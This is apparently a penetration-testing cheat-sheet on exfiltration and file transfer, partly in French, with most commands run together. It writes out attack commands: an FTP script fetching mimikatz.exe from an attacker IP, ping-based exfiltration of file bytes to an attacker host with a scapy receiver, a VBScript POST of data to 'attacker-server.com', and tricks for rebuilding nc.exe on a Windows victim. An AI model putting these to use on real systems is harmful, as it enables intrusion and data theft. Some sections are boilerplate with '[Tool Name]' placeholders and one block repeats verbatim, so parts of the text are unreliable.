#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Client Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali en tant que serveur
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Ou créez un partage smb en utilisant samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Exfiltration
Techniques
Exfiltration Over Command and Control Channel
Description: Data exfiltration can be achieved by sending commands to the compromised system to exfiltrate data over the command and control channel.
Detection: Monitor network traffic for suspicious commands or data transfers over the command and control channel.
Exfiltration Over Alternative Protocol
Description: Data exfiltration can be achieved by using alternative protocols such as DNS, ICMP, or HTTPS to bypass network security controls.
Detection: Monitor network traffic for unusual patterns or data transfers over non-standard protocols.
Tools
[Tool Name]: Description of the tool and how it can be used for data exfiltration.
[Tool Name]: Description of the tool and how it can be used for data exfiltration.
Countermeasures
Implement network segmentation to restrict communication between different parts of the network.
Use encryption to protect data in transit and prevent unauthorized access to exfiltrated data.
Exfiltration
Techniques
Exfiltration Over Command and Control Channel
Description: Data exfiltration can be achieved by sending commands to the compromised system to exfiltrate data over the command and control channel.
Detection: Monitor network traffic for suspicious commands or data transfers over the command and control channel.
Exfiltration Over Alternative Protocol
Description: Data exfiltration can be achieved by using alternative protocols such as DNS, ICMP, or HTTPS to bypass network security controls.
Detection: Monitor network traffic for unusual patterns or data transfers over non-standard protocols.
Tools
[Tool Name]: Description of the tool and how it can be used for data exfiltration.
[Tool Name]: Description of the tool and how it can be used for data exfiltration.
Countermeasures
Implement network segmentation to restrict communication between different parts of the network.
Use encryption to protect data in transit and prevent unauthorized access to exfiltrated data.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
Netcat (nc) is a versatile networking tool that can be used for various purposes, including exfiltration of data. It allows for creating connections to remote hosts, listening on ports, and transferring data between systems. Netcat can be used to exfiltrate data over the network in a stealthy manner.
Methodology
Basic Usage: Netcat can be used to transfer files between systems by setting up a listener on the receiving end and connecting to it from the sending end.
Reverse Shells: Netcat can be used to create reverse shells, allowing an attacker to gain remote access to a system and exfiltrate data.
Port Scanning: Netcat can also be used for port scanning to identify open ports on a target system, which can then be used for exfiltration.
Encryption: To secure data during exfiltration, Netcat can be used in combination with encryption tools like OpenSSL to encrypt the data before transmission.
Prevention
Firewall Rules: Implement strict firewall rules to restrict the usage of Netcat on systems to prevent unauthorized data exfiltration.
Network Monitoring: Monitor network traffic for any suspicious activities or the use of Netcat to exfiltrate data.
File Integrity Monitoring: Implement file integrity monitoring to detect any unauthorized file transfers using Netcat.
User Training: Provide security awareness training to users to educate them about the risks associated with tools like Netcat and how to prevent data exfiltration.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Si vous pouvez envoyer des données à un serveur SMTP, vous pouvez créer un SMTP pour recevoir les données avec python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Par défaut dans XP et 2003 (dans d'autres, il doit être ajouté explicitement lors de l'installation)
Dans Kali, démarrer le serveur TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is commonly used for writing scripts to automate tasks on Windows operating systems.
Exfiltration Techniques
VBScript can be used for exfiltrating data from a compromised system. Below are some techniques that can be used:
Writing to Files: VBScript can be used to write data to files on the system, which can then be exfiltrated by the attacker.
Sending Emails: VBScript can also be used to send emails with the exfiltrated data as attachments or within the email body.
HTTP Requests: VBScript can make HTTP requests to a remote server controlled by the attacker, sending the exfiltrated data in the request body.
Example
Below is an example of VBScript code that exfiltrates data by sending an HTTP request:
Dim objXMLHTTP
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objXMLHTTP.Open "POST", "http://attacker-server.com/exfiltrate", False
objXMLHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXMLHTTP.send "data=exfiltrated_data"
In this example, the VBScript code creates an HTTP POST request to "http://attacker-server.com/exfiltrate" with the exfiltrated data in the request body.
Mitigation
To mitigate the risk of exfiltration using VBScript, organizations should restrict the use of VBScript on their systems and monitor for any suspicious VBScript activities. Regular security training for employees can also help in preventing attackers from using VBScript for exfiltration.
Le programme debug.exe permet non seulement l'inspection des binaires, mais a également la capacité de les reconstruire à partir de l'hexadécimal. Cela signifie qu'en fournissant un hexadécimal d'un binaire, debug.exe peut générer le fichier binaire. Cependant, il est important de noter que debug.exe a une limite d'assemblage de fichiers jusqu'à 64 ko en taille.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Ensuite, copiez-collez le texte dans le shell Windows et un fichier appelé nc.exe sera créé.
